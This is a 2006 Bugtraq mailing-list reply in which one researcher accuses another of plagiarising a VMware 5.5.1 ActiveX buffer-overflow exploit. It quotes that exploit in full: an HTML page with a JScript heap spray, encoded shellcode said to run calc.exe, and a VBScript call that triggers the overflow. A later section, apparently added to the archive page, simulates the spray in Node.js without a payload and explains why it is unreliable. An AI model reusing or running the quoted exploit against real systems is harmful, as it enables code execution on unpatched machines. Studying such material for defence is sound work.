Open Source and information security mailing list archives
Message-ID: <814b9d50611271135w436bdea2kb7a94fc8b2ae9c9c@mail.gmail.com>
Date: Mon, 27 Nov 2006 13:35:53 -0600
From: str0ke <str0ke@...w0rm.com>
To: "NormandiaN_MailID@...oo.com" <NormandiaN_MailID@...oo.com>
Cc: bugtraq@...urityfocus.com
Subject: Re: VMware 5.5.1 Local Buffer Overflow (HTML Exploit)

NormandiaN the code thief,

c0ntex discovered this and released it on August 18th 2006; you
pretty much stole everything from it line for line.  Nice job.

http://www.milw0rm.com/exploits/2264

/str0ke

On 26 Nov 2006 06:05:34 -0000, NormandiaN_MailID@...oo.com
<NormandiaN_MailID@...oo.com> wrote:
> <html>
> <head>
> <title>WinXP Pro SP2 lame local VMWare Buffer Overflow</title>
> </head>
> <body>
> <center>
> <br>
> Discovered By NormandiaN<br>
> Visit my website at http://www.grisapka.org<br>
> <br>
> <h3>
> This will exploit overflow and execute calc.exe on WinXP Pro SP2<br>
> (fully patched) against VMWare 5.5.1 Initialize ActiveX member.<br>
> </h3>
> I have only found a bad solution to this bug. Due to the fact that<br>
> my controlling assembler is a call dword ptr[reg] I need to point<br>
> to a location I control, fine. However my payload is random pretty<br>
> much every run. Therefore I fill half a HUGE buffer with the address<br>
> (pointer) to my evil buffer, which then trampolines me to shellcode<br>
> <br>
> call ptr [reg]<br>
> [reg] -> 0xtrampoline<br>
> 0xtrampoline -> shellcode<br>
> <br>
> </center>
> <script>
> var buffa1 = unescape("%uedb0%u0d91")
> do {
> buffa1 += buffa1;
> }
> while (buffa1.length < 0x500000);
> var buffa2 = unescape("%u9090%u9090")
> do {
> buffa2 += buffa2;
> }
> while (buffa2.length < 0x800000);
> buffa1 += buffa2;
> buffa1 += unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
> "%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
> "%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
> "%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
> "%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
> "%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
> "%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
> "%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
> "%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
> "%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +
> "%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
> "%uCC4A%uD0FF");
> </script>
> <object id="target" classid="clsid:F76E4799-379B-4362-BCC4-68B753D10744">
> </object>
> <script language="vbscript">
> VmdbDb="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
> VmdbPoll=200011744
> target.Initialize VmdbDb, VmdbPoll
> </script>
> </body>
> </html>
>
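The quoted post describes a pointer-fill plus NOP-sled spray and calls it "a bad solution" because the payload's address changes from run to run. The following is an added example, written for this archive page and not taken from the quoted post or from the milw0rm exploit it copies. It builds the same JScript string the post builds (using String.fromCharCode in place of unescape) and then simulates what `call dword ptr [reg]` does for a hypothetical base address of that string in the heap. Nothing is executed: the shellcode is replaced by a constructed two-byte 0xCC marker, and the base and register values are assumptions chosen to show the three cases (lands in the sled, lands in the pointer half, points outside the spray). Run it with Node.js.

```javascript
// Added example (not code from the quoted post or from c0ntex's exploit).
// Models the spray layout described in the post and simulates the
// `call dword ptr [reg]` -> [reg] -> 0xtrampoline -> shellcode chain.

const TRAMPOLINE = 0x0d91edb0;   // dword the first half is filled with ("%uedb0%u0d91")
const PTR_MIN_CHARS = 0x500000;  // loop bounds from the post, in UTF-16 code units
const SLED_MIN_CHARS = 0x800000;

// Same doubling loops as the post. Note that each loop overshoots to the next
// power of two: the 0x500000 bound ends up as 0x800000 chars (0x1000000 bytes).
function buildSpray(shellcode) {
  let ptrs = String.fromCharCode(0xedb0, 0x0d91);   // bytes b0 ed 91 0d = 0x0d91edb0 little-endian
  do { ptrs += ptrs; } while (ptrs.length < PTR_MIN_CHARS);
  let sled = String.fromCharCode(0x9090, 0x9090);   // bytes 90 90 90 90 = NOP sled
  do { sled += sled; } while (sled.length < SLED_MIN_CHARS);
  return {
    // JScript keeps strings as UTF-16LE, so this is the byte image the heap holds.
    bytes: Buffer.from(ptrs + sled + shellcode, 'utf16le'),
    ptrEnd: ptrs.length * 2,                   // byte offset where the NOP sled starts
    sledEnd: (ptrs.length + sled.length) * 2,  // byte offset where the shellcode starts
  };
}

// Simulate `call dword ptr [reg]` with the spray mapped at `base` (hypothetical).
// reg is the register the overflow controls; it has to point into the
// pointer-filled half, on a 4-byte boundary, for the trampoline to be fetched.
function simulateCall(spray, base, reg) {
  const off = reg - base;
  if (off < 0 || off + 4 > spray.bytes.length) {
    return { outcome: 'fault', reason: '[reg] is outside the spray' };
  }
  const target = spray.bytes.readUInt32LE(off);  // what the CPU fetches from [reg]
  const toff = target - base;
  if (toff < 0 || toff >= spray.bytes.length) {
    return { outcome: 'fault', target, reason: 'trampoline points outside the spray' };
  }
  if (toff < spray.ptrEnd) {
    return { outcome: 'unreliable', target, reason: 'landed in the pointer half, not the sled' };
  }
  if (toff < spray.sledEnd) {
    // NOP sled: execution slides forward until the first shellcode byte.
    return { outcome: 'shellcode', target, slide: spray.sledEnd - toff };
  }
  return { outcome: 'unreliable', target, reason: 'landed past the sled, mid-shellcode' };
}

// Base addresses for which TRAMPOLINE falls inside the sled, i.e.
// ptrEnd <= TRAMPOLINE - base < sledEnd. The width of this window is what the
// post's reliability depends on: the allocator decides where the string lands.
function goodBaseRange(spray) {
  return { lo: TRAMPOLINE - spray.sledEnd + 1, hi: TRAMPOLINE - spray.ptrEnd };
}

// Constructed stand-in for shellcode: two int3 bytes, not a payload.
const MARKER = String.fromCharCode(0xcccc);

const spray = buildSpray(MARKER);
const range = goodBaseRange(spray);
console.log('pointer half ends at 0x' + spray.ptrEnd.toString(16) +
            ', sled ends at 0x' + spray.sledEnd.toString(16));
console.log('base addresses that work: 0x' + range.lo.toString(16) +
            ' .. 0x' + range.hi.toString(16));
// Three hypothetical placements of the string, reg pointing 0x100 bytes into it.
for (const base of [range.lo + 0x800000, range.hi + 0x100000, TRAMPOLINE + 0x1000]) {
  console.log('base 0x' + base.toString(16) + ':', simulateCall(spray, base, base + 0x100));
}
// A reg that is off by two bytes reads a rotated dword (0xedb00d91), so the
// chain also depends on reg's alignment within the pattern.
console.log('reg misaligned by 2:', simulateCall(spray, range.lo + 0x800000, range.lo + 0x800102));
```

The useful numbers here are the ones the post's prose does not give: the doubling loops produce 16 MiB of pointers and 16 MiB of NOPs regardless of the 0x500000/0x800000 bounds, and the trampoline only reaches the sled for base addresses in a 16 MiB window below 0x0d91edb0. Outside that window the dereferenced dword lands in the pointer bytes or outside the string altogether, which is the run-to-run failure the author describes.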
